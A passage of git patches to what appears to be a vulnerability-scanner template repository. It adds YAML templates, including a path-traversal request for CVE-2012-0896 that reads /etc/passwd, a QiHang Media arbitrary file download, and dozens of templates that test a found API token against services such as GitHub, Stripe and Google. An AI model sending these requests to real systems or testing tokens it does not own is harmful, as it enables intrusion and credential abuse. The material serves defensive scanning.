"{{BaseURL}}" + + matchers: - type: word words: From f84a1659ab88e0092cea594ebf4f98e7503809bf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 1 Oct 2021 16:21:20 +0530 Subject: [PATCH 2675/4083] Update samba-swat-panel.yaml --- exposed-panels/samba-swat-panel.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/samba-swat-panel.yaml b/exposed-panels/samba-swat-panel.yaml index b69bd29f52..833afa73dc 100644 --- a/exposed-panels/samba-swat-panel.yaml +++ b/exposed-panels/samba-swat-panel.yaml @@ -9,7 +9,6 @@ requests: - method: GET path: - "{{BaseURL}}" - matchers: - type: word From ea71661d796c0d369b814d2562d1a617531585da Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 1 Oct 2021 16:26:25 +0530 Subject: [PATCH 2676/4083] Update and rename qihang-media-web-credentials-disclosure.yaml to qihang-media-disclosure.yaml --- ...ials-disclosure.yaml => qihang-media-disclosure.yaml} | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) rename vulnerabilities/other/{qihang-media-web-credentials-disclosure.yaml => qihang-media-disclosure.yaml} (85%) diff --git a/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml b/vulnerabilities/other/qihang-media-disclosure.yaml similarity index 85% rename from vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml rename to vulnerabilities/other/qihang-media-disclosure.yaml index 018107e323..4bc2973454 100644 --- a/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml +++ b/vulnerabilities/other/qihang-media-disclosure.yaml @@ -1,4 +1,4 @@ -id: qihang-media-web-credentials-disclosure +id: qihang-media-disclosure info: name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure @@ -16,7 +16,8 @@ requests: matchers: - type: word words: - - "User id" - - "account" - - "password" + - "" + - "account=" + - "password=" condition: and From 58fd3724989ebe5b8bcccd76572258406194daed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 1 Oct 2021 16:28:20 +0530 Subject: [PATCH 2677/4083] Update and rename qihang-media-web-lfi.yaml to qihang-media-lfi.yaml --- .../{qihang-media-web-lfi.yaml => qihang-media-lfi.yaml} | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) rename vulnerabilities/other/{qihang-media-web-lfi.yaml => qihang-media-lfi.yaml} (80%) diff --git a/vulnerabilities/other/qihang-media-web-lfi.yaml b/vulnerabilities/other/qihang-media-lfi.yaml similarity index 80% rename from vulnerabilities/other/qihang-media-web-lfi.yaml rename to vulnerabilities/other/qihang-media-lfi.yaml index c05da3717f..a4bcd43d65 100644 --- a/vulnerabilities/other/qihang-media-web-lfi.yaml +++ b/vulnerabilities/other/qihang-media-lfi.yaml @@ -1,4 +1,4 @@ -id: qihang-media-web-lfi +id: qihang-media-lfi info: name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability @@ -13,16 +13,13 @@ requests: - | GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1 Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 Connection: close matchers-condition: and matchers: - type: word words: - - "attachment" + - "filename=QH.aspx" - "application/zip" part: header condition: and From d7e6cb313e19ef147c022a9f0882ebae5c6e8770 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 1 Oct 2021 16:31:50 +0530 Subject: [PATCH 2678/4083] Update wp-woocommerce-email-verification.yaml --- .../wordpress/wp-woocommerce-email-verification.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml b/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml index 136514ef96..b517370fc7 100644 --- a/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml +++ b/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml @@ -13,7 +13,7 @@ requests: path: - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - + stop-at-first-match: true matchers-condition: and matchers: From dddbd4f015c94b954e9e60e4c4d768c8926280c9 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 1 Oct 2021 18:02:42 +0700 Subject: [PATCH 2679/4083] Create CVE-2012-0896.yaml --- cves/2012/CVE-2012-0896.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2012/CVE-2012-0896.yaml diff --git a/cves/2012/CVE-2012-0896.yaml b/cves/2012/CVE-2012-0896.yaml new file mode 100644 index 0000000000..5e2ad102d4 --- /dev/null +++ b/cves/2012/CVE-2012-0896.yaml @@ -0,0 +1,27 @@ +id: CVE-2012-0896 + +info: + name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access + author: daffainfo + severity: high + description: Absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. + reference: + - https://packetstormsecurity.com/files/108631/ + - https://www.cvedetails.com/cve/CVE-2012-0896 + tags: cve,cve2012,lfi,wordpress,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 3e2937db150aa6a97ad20969990ae7d618122d46 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 1 Oct 2021 16:42:05 +0530 Subject: [PATCH 2680/4083] Update and rename amazon-sns-topic.yaml to amazon-sns-token.yaml --- .../keys/{amazon-sns-topic.yaml => amazon-sns-token.yaml} | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename file/keys/{amazon-sns-topic.yaml => amazon-sns-token.yaml} (62%) diff --git a/file/keys/amazon-sns-topic.yaml b/file/keys/amazon-sns-token.yaml similarity index 62% rename from file/keys/amazon-sns-topic.yaml rename to file/keys/amazon-sns-token.yaml index b36e22c620..96d12f5fbb 100644 --- a/file/keys/amazon-sns-topic.yaml +++ b/file/keys/amazon-sns-token.yaml @@ -1,10 +1,10 @@ -id: amazon-sns-topic +id: amazon-sns-token info: - name: Amazon SNS Topic Detect + name: Amazon SNS Token Detect author: TheBinitGhimire severity: info - tags: file,token,amazon + tags: file,token,amazon,aws file: - extensions: @@ -12,6 +12,6 @@ file: extractors: - type: regex - name: slack-bot-token-strings + name: amazon-sns-topic regex: - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' From e0ba32c3501ff295388e2303bca61bb126804f2a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 1 Oct 2021 19:48:03 +0530 Subject: [PATCH 2681/4083] Update vmware-version-detect.yaml --- technologies/vmware-version-detect.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/technologies/vmware-version-detect.yaml b/technologies/vmware-version-detect.yaml index 2321779424..64ecd7d1ad 100644 --- a/technologies/vmware-version-detect.yaml +++ b/technologies/vmware-version-detect.yaml @@ -42,7 +42,8 @@ requests: - type: word part: body words: - - ha-folder-root + - 'ha-folder-root' + - 'RetrieveServiceContentResponse' - type: word words: @@ -56,3 +57,7 @@ requests: regex: - "(.*?)" - "(.*?)" + - "(.*?)" + - "(.*?)" + - "(.*?)" + - "(.*?)" From 0eec0ff2b4910c1b080979c71f609e621ee16690 Mon Sep 17 00:00:00 2001 From: "zzeitlin@bishopfox.com" <58756038+zzeitlin@users.noreply.github.com> Date: Fri, 1 Oct 2021 14:33:51 +0000 Subject: [PATCH 2682/4083] Initialize api templates --- apis/README.md | 16 ++++++++++++++++ apis/asana.yaml | 24 ++++++++++++++++++++++++ apis/bingmaps.yaml | 23 +++++++++++++++++++++++ apis/bitly.yaml | 24 ++++++++++++++++++++++++ apis/buildkite.yaml | 24 ++++++++++++++++++++++++ apis/buttercms.yaml | 23 +++++++++++++++++++++++ apis/calendly.yaml | 23 +++++++++++++++++++++++ apis/circleci.yaml | 22 ++++++++++++++++++++++ apis/deviantart.yaml | 25 +++++++++++++++++++++++++ apis/dropbox.yaml | 23 +++++++++++++++++++++++ apis/github.yaml | 24 ++++++++++++++++++++++++ apis/googleautocomplete.yaml | 23 +++++++++++++++++++++++ apis/googlecustomsearch.yaml | 23 +++++++++++++++++++++++ apis/googledirections.yaml | 24 ++++++++++++++++++++++++ apis/googleelevation.yaml | 23 +++++++++++++++++++++++ apis/googlefcm.yaml | 24 ++++++++++++++++++++++++ apis/googlefindplacefromtext.yaml | 23 +++++++++++++++++++++++ apis/googlegedistancematrix.yaml | 23 +++++++++++++++++++++++ apis/googlegeocode.yaml | 23 +++++++++++++++++++++++ apis/googlegeolocation.yaml | 28 ++++++++++++++++++++++++++++ apis/googlemapsembed.yaml | 21 +++++++++++++++++++++ apis/googlemapsembedadvanced.yaml | 21 +++++++++++++++++++++ apis/googlenearbysearch.yaml | 23 +++++++++++++++++++++++ apis/googlenearestroads.yaml | 23 +++++++++++++++++++++++ apis/googleplacedetails.yaml | 23 +++++++++++++++++++++++ apis/googleplacesphoto.yaml | 21 +++++++++++++++++++++ apis/googleplayablelocations.yaml | 23 +++++++++++++++++++++++ apis/googleroutetotraveled.yaml | 23 +++++++++++++++++++++++ apis/googlespeedlimit.yaml | 23 +++++++++++++++++++++++ apis/googlestaticmaps.yaml | 21 +++++++++++++++++++++ apis/googlestreetview.yaml | 21 +++++++++++++++++++++ apis/googletextsearchplaces.yaml | 23 +++++++++++++++++++++++ apis/googletimezone.yaml | 23 +++++++++++++++++++++++ apis/heroku.yaml | 28 ++++++++++++++++++++++++++++ apis/hubspot.yaml | 25 +++++++++++++++++++++++++ apis/instagram.yaml | 22 ++++++++++++++++++++++ apis/ipstack.yaml | 24 ++++++++++++++++++++++++ apis/iterable.yaml | 25 +++++++++++++++++++++++++ apis/jumpcloud.yaml | 25 +++++++++++++++++++++++++ apis/lokalise.yaml | 23 +++++++++++++++++++++++ apis/loqate.yaml | 24 ++++++++++++++++++++++++ apis/mailchimp.yaml | 21 +++++++++++++++++++++ apis/mailgun.yaml | 23 +++++++++++++++++++++++ apis/mapbox.yaml | 23 +++++++++++++++++++++++ apis/nerdgraph.yaml | 27 +++++++++++++++++++++++++++ apis/npm.yaml | 25 +++++++++++++++++++++++++ apis/openweather.yaml | 22 ++++++++++++++++++++++ apis/pagerduty.yaml | 25 +++++++++++++++++++++++++ apis/pendo.yaml | 27 +++++++++++++++++++++++++++ apis/pivotaltracker.yaml | 25 +++++++++++++++++++++++++ apis/postmark.yaml | 24 ++++++++++++++++++++++++ apis/sendgrid.yaml | 23 +++++++++++++++++++++++ apis/slack.yaml | 25 +++++++++++++++++++++++++ apis/sonarcloud.yaml | 24 ++++++++++++++++++++++++ apis/spotify.yaml | 23 +++++++++++++++++++++++ apis/square.yaml | 27 +++++++++++++++++++++++++++ apis/stripe.yaml | 23 +++++++++++++++++++++++ apis/tinypng.yaml | 26 ++++++++++++++++++++++++++ apis/token.txt | 1 + apis/travisci.yaml | 25 +++++++++++++++++++++++++ apis/twitter.yaml | 25 +++++++++++++++++++++++++ apis/visualstudio.yaml | 26 ++++++++++++++++++++++++++ apis/wakatime.yaml | 23 +++++++++++++++++++++++ apis/weglot.yaml | 26 ++++++++++++++++++++++++++ apis/youtube.yaml | 27 +++++++++++++++++++++++++++ 65 files changed, 1516 insertions(+) create mode 100644 apis/README.md create mode 100644 apis/asana.yaml create mode 100644 apis/bingmaps.yaml create mode 100644 apis/bitly.yaml create mode 100644 apis/buildkite.yaml create mode 100644 apis/buttercms.yaml create mode 100644 apis/calendly.yaml create mode 100644 apis/circleci.yaml create mode 100644 apis/deviantart.yaml create mode 100644 apis/dropbox.yaml create mode 100644 apis/github.yaml create mode 100644 apis/googleautocomplete.yaml create mode 100644 apis/googlecustomsearch.yaml create mode 100644 apis/googledirections.yaml create mode 100644 apis/googleelevation.yaml create mode 100644 apis/googlefcm.yaml create mode 100644 apis/googlefindplacefromtext.yaml create mode 100644 apis/googlegedistancematrix.yaml create mode 100644 apis/googlegeocode.yaml create mode 100644 apis/googlegeolocation.yaml create mode 100644 apis/googlemapsembed.yaml create mode 100644 apis/googlemapsembedadvanced.yaml create mode 100644 apis/googlenearbysearch.yaml create mode 100644 apis/googlenearestroads.yaml create mode 100644 apis/googleplacedetails.yaml create mode 100644 apis/googleplacesphoto.yaml create mode 100644 apis/googleplayablelocations.yaml create mode 100644 apis/googleroutetotraveled.yaml create mode 100644 apis/googlespeedlimit.yaml create mode 100644 apis/googlestaticmaps.yaml create mode 100644 apis/googlestreetview.yaml create mode 100644 apis/googletextsearchplaces.yaml create mode 100644 apis/googletimezone.yaml create mode 100644 apis/heroku.yaml create mode 100644 apis/hubspot.yaml create mode 100644 apis/instagram.yaml create mode 100644 apis/ipstack.yaml create mode 100644 apis/iterable.yaml create mode 100644 apis/jumpcloud.yaml create mode 100644 apis/lokalise.yaml create mode 100644 apis/loqate.yaml create mode 100644 apis/mailchimp.yaml create mode 100644 apis/mailgun.yaml create mode 100644 apis/mapbox.yaml create mode 100644 apis/nerdgraph.yaml create mode 100644 apis/npm.yaml create mode 100644 apis/openweather.yaml create mode 100644 apis/pagerduty.yaml create mode 100644 apis/pendo.yaml create mode 100644 apis/pivotaltracker.yaml create mode 100644 apis/postmark.yaml create mode 100644 apis/sendgrid.yaml create mode 100644 apis/slack.yaml create mode 100644 apis/sonarcloud.yaml create mode 100644 apis/spotify.yaml create mode 100644 apis/square.yaml create mode 100644 apis/stripe.yaml create mode 100644 apis/tinypng.yaml create mode 100644 apis/token.txt create mode 100644 apis/travisci.yaml create mode 100644 apis/twitter.yaml create mode 100644 apis/visualstudio.yaml create mode 100644 apis/wakatime.yaml create mode 100644 apis/weglot.yaml create mode 100644 apis/youtube.yaml diff --git a/apis/README.md b/apis/README.md new file mode 100644 index 0000000000..403b61d3a1 --- /dev/null +++ b/apis/README.md @@ -0,0 +1,16 @@ +## About +This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By placing the token in `token.txt`, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant). + +## Usage +You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `apis` directory assumes the input API token will be placed in a file called `token.txt`. The `token.txt` file can exist in your current working directory or in the same directory as the template `yaml` file. + +```bash +# Input the token into token.txt: +$ echo -n "thisIsMySecretTokenThatIWantToTest" > token.txt + +# Run Nuclei specifying all the api templates: +$ nuclei -u "null" -t ./nuclei-templates/apis/ +``` + +## Credits +These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. diff --git a/apis/asana.yaml b/apis/asana.yaml new file mode 100644 index 0000000000..583f02e5a4 --- /dev/null +++ b/apis/asana.yaml @@ -0,0 +1,24 @@ +id: api-asana + +info: + name: Asana API Test + author: zzeitlin + reference: https://developers.asana.com/docs/using-terminal + severity: info + tags: api,asana + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://app.asana.com/api/1.0/users/me" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: Bearer {{token}} + matchers: + - type: status + status: + - 401 + negative: true diff --git a/apis/bingmaps.yaml b/apis/bingmaps.yaml new file mode 100644 index 0000000000..05bc705c0e --- /dev/null +++ b/apis/bingmaps.yaml @@ -0,0 +1,23 @@ +id: api-bingmaps + +info: + name: Bing Maps API Test + author: zzeitlin + reference: https://docs.microsoft.com/en-us/bingmaps/rest-services/locations/find-a-location-by-address + severity: info + tags: api,bing,maps,bingmaps + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'ValidCredentials' diff --git a/apis/bitly.yaml b/apis/bitly.yaml new file mode 100644 index 0000000000..4601ed1361 --- /dev/null +++ b/apis/bitly.yaml @@ -0,0 +1,24 @@ +id: api-bitly + +info: + name: Bitly API Test + author: zzeitlin + reference: https://dev.bitly.com/api-reference + severity: info + tags: api,bitly + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + negative: true + words: + - 'INVALID_ARG_ACCESS_TOKEN' diff --git a/apis/buildkite.yaml b/apis/buildkite.yaml new file mode 100644 index 0000000000..fd1466746b --- /dev/null +++ b/apis/buildkite.yaml @@ -0,0 +1,24 @@ +id: api-buildkite + +info: + name: Buildkite API Test + author: zzeitlin + reference: https://buildkite.com/docs/apis/rest-api/user + severity: info + tags: api,buildkite + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.buildkite.com/v2/user" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: Bearer {{token}} + matchers: + - type: status + status: + - 401 + negative: true diff --git a/apis/buttercms.yaml b/apis/buttercms.yaml new file mode 100644 index 0000000000..62178ec48b --- /dev/null +++ b/apis/buttercms.yaml @@ -0,0 +1,23 @@ +id: api-buttercms + +info: + name: ButterCMS API Test + author: zzeitlin + reference: https://buttercms.com/docs/api/#introduction + severity: info + tags: api,buttercms + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: status + status: + - 401 + negative: true diff --git a/apis/calendly.yaml b/apis/calendly.yaml new file mode 100644 index 0000000000..23936895ff --- /dev/null +++ b/apis/calendly.yaml @@ -0,0 +1,23 @@ +id: api-calendly + +info: + name: Calendly API Test + author: zzeitlin + reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me + severity: info + tags: api,calendly + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://calendly.com/api/v1/users/me" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + X-Token: "{{token}}" + matchers: + - type: status + status: + - 200 diff --git a/apis/circleci.yaml b/apis/circleci.yaml new file mode 100644 index 0000000000..4ffe4d2771 --- /dev/null +++ b/apis/circleci.yaml @@ -0,0 +1,22 @@ +id: api-circleci + +info: + name: CircleCI API Test + author: zzeitlin + reference: https://circleci.com/docs/api/v1 + severity: info + tags: api,circle,circleci + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://circleci.com/api/v1.1/me?circle-token={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: status + status: + - 200 diff --git a/apis/deviantart.yaml b/apis/deviantart.yaml new file mode 100644 index 0000000000..20a7ff91c8 --- /dev/null +++ b/apis/deviantart.yaml @@ -0,0 +1,25 @@ +id: api-deviantart + +info: + name: DeviantArt API Test + author: zzeitlin + reference: https://www.deviantart.com/developers/authentication + severity: info + tags: api,deviantart + +requests: + - method: POST + payloads: + token: token.txt + path: + - "https://www.deviantart.com/api/v1/oauth2/placebo" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + body: "access_token={{token}}" + matchers: + - type: word + part: body + words: + - '"status":"error"' + negative: true diff --git a/apis/dropbox.yaml b/apis/dropbox.yaml new file mode 100644 index 0000000000..900f2d5c15 --- /dev/null +++ b/apis/dropbox.yaml @@ -0,0 +1,23 @@ +id: api-dropbox + +info: + name: Dropbox API Test + author: zzeitlin + reference: https://www.dropbox.com/developers/documentation/http/documentation + severity: info + tags: api,dropbox + +requests: + - method: POST + payloads: + token: token.txt + path: + - "https://api.dropboxapi.com/2/users/get_current_account" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: Bearer {{token}} + matchers: + - type: status + status: + - 200 diff --git a/apis/github.yaml b/apis/github.yaml new file mode 100644 index 0000000000..ba3a7788c1 --- /dev/null +++ b/apis/github.yaml @@ -0,0 +1,24 @@ +id: api-github + +info: + name: GitHub API Test + author: zzeitlin + reference: https://docs.github.com/en/rest/reference/users + severity: info + tags: api,github + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.github.com/user" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: Basic {{base64('user:' + token)}} + matchers: + - type: word + part: body + words: + - 'login' diff --git a/apis/googleautocomplete.yaml b/apis/googleautocomplete.yaml new file mode 100644 index 0000000000..e38ceb76b8 --- /dev/null +++ b/apis/googleautocomplete.yaml @@ -0,0 +1,23 @@ +id: api-googleautocomplete + +info: + name: Google Autocomplete API Test + author: zzeitlin + severity: info + tags: api,google,autocomplete + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error_message' + negative: true diff --git a/apis/googlecustomsearch.yaml b/apis/googlecustomsearch.yaml new file mode 100644 index 0000000000..d5f8d9477f --- /dev/null +++ b/apis/googlecustomsearch.yaml @@ -0,0 +1,23 @@ +id: api-googlecustomsearch + +info: + name: Google Custom Search API Test + author: zzeitlin + severity: info + tags: api,google,search + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://www.googleapis.com/customsearch/v1?cx=017576662512468239146:omuauf_lfve&q=lectures&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error' + negative: true diff --git a/apis/googledirections.yaml b/apis/googledirections.yaml new file mode 100644 index 0000000000..fbc7a2be93 --- /dev/null +++ b/apis/googledirections.yaml @@ -0,0 +1,24 @@ +id: api-googledirections + +info: + name: Google Directions API Test + author: zzeitlin + severity: info + tags: api,google,directions + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error_message' + negative: true + diff --git a/apis/googleelevation.yaml b/apis/googleelevation.yaml new file mode 100644 index 0000000000..3dc50b59bc --- /dev/null +++ b/apis/googleelevation.yaml @@ -0,0 +1,23 @@ +id: api-googleelevation + +info: + name: Google Elevation API Test + author: zzeitlin + severity: info + tags: api,google,elevation + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error_message' + negative: true diff --git a/apis/googlefcm.yaml b/apis/googlefcm.yaml new file mode 100644 index 0000000000..301f625869 --- /dev/null +++ b/apis/googlefcm.yaml @@ -0,0 +1,24 @@ +id: api-googlefcm + +info: + name: Google FCM API Test + author: zzeitlin + severity: info + tags: api,google,fcm,firebase,cloud,messaging + +requests: + - method: POST + payloads: + token: token.txt + path: + - "https://fcm.googleapis.com/fcm/send" + redirects: false + body: "{'registration_ids':['ABC']}" + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: key={{token}} + Content-Type: application/json + matchers: + - type: status + status: + - 200 diff --git a/apis/googlefindplacefromtext.yaml b/apis/googlefindplacefromtext.yaml new file mode 100644 index 0000000000..f502ca9de8 --- /dev/null +++ b/apis/googlefindplacefromtext.yaml @@ -0,0 +1,23 @@ +id: api-googlefindplacefromtext + +info: + name: Google Find Place From Text API Test + author: zzeitlin + severity: info + tags: api,google,find,text + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error_message' + negative: true diff --git a/apis/googlegedistancematrix.yaml b/apis/googlegedistancematrix.yaml new file mode 100644 index 0000000000..8fb55af126 --- /dev/null +++ b/apis/googlegedistancematrix.yaml @@ -0,0 +1,23 @@ +id: api-googledistancematrix + +info: + name: Google Distance Matrix API Test + author: zzeitlin + severity: info + tags: api,google,distance,matrix + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error_message' + negative: true diff --git a/apis/googlegeocode.yaml b/apis/googlegeocode.yaml new file mode 100644 index 0000000000..3630805098 --- /dev/null +++ b/apis/googlegeocode.yaml @@ -0,0 +1,23 @@ +id: api-googlegeocode + +info: + name: Google Geocode API Test + author: zzeitlin + severity: info + tags: api,google,geocode + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error_message' + negative: true diff --git a/apis/googlegeolocation.yaml b/apis/googlegeolocation.yaml new file mode 100644 index 0000000000..d314654658 --- /dev/null +++ b/apis/googlegeolocation.yaml @@ -0,0 +1,28 @@ +id: api-googlegeolocation + +info: + name: Google Geolocation API Test + author: zzeitlin + severity: info + tags: api,google,geolocation + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'error' + negative: true + - type: status + status: + - 404 + negative: true diff --git a/apis/googlemapsembed.yaml b/apis/googlemapsembed.yaml new file mode 100644 index 0000000000..874c52c7b5 --- /dev/null +++ b/apis/googlemapsembed.yaml @@ -0,0 +1,21 @@ +id: api-googlemapsembed + +info: + name: Google Maps Embed API Test + author: zzeitlin + severity: info + tags: api,google,maps,embed + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://www.google.com/maps/embed/v1/place?q=Seattle&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 